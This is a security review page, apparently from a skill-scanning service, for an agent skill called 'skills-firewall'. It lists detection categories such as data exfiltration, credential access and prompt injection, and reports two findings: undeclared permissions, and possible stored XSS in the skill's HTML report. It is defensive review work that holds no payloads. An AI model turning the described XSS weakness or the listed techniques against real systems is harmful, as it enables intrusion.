skills-firewall

Security checks across malware telemetry and agentic risk

Overview

This appears to be a local skill scanner, but it overstates itself as an enforcing firewall and its HTML report can render unescaped scanned names or fields.

Treat this as a lightweight local pattern scanner, not a real firewall. Run it only on specific skill folders, review findings manually, be careful opening HTML reports generated from untrusted skill directories, and do not rely on its block or quarantine labels to stop a risky skill from being installed or run.

SkillSpector

By NVIDIA

Vulnerability Patterns

Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code

Findings (2)

Lp3

Medium

Category: MCP Least Privilege
Confidence: 89% confidence
Finding: The skill documentation exposes operational capabilities that include file read/write, network access, and shell execution, but it does not declare any permissions or constraints. For a security-sensitive skill that scans arbitrary paths and manages allow/block lists, this mismatch reduces transparency and makes it harder for reviewers or enforcement systems to apply least privilege.

Missing User Warnings

Medium

Confidence: 97% confidence
Finding: The HTML report is built with raw f-string interpolation of untrusted fields such as skill names, categories, warnings, and recommendations into HTML content. If a scanned skill contains HTML or JavaScript payloads in those fields, opening the generated report in a browser could trigger stored/report-based XSS, compromising the viewer's browser session or misleading analysts.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal